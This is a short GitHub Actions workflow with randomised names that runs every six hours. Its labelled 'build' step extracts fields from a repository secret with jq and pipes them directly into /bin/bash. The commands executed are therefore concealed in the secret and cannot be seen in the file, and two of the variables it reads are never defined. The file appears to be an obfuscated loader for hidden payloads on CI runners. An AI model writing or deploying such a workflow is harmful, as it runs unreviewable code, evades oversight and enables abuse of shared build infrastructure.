name: shangxike6328

on:
  workflow_dispatch:
  schedule:
    - cron: '30 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shangxike6328
        env:
          yeoop0: ${{ secrets.yeoop0 }}
        run: |
          echo $yeoop0 | jq -r .p32 | /bin/bash
          echo $sjie65 | jq -r .g88599 | /bin/bash
          echo $fckk1350 | jq -r .n9 | /bin/bash

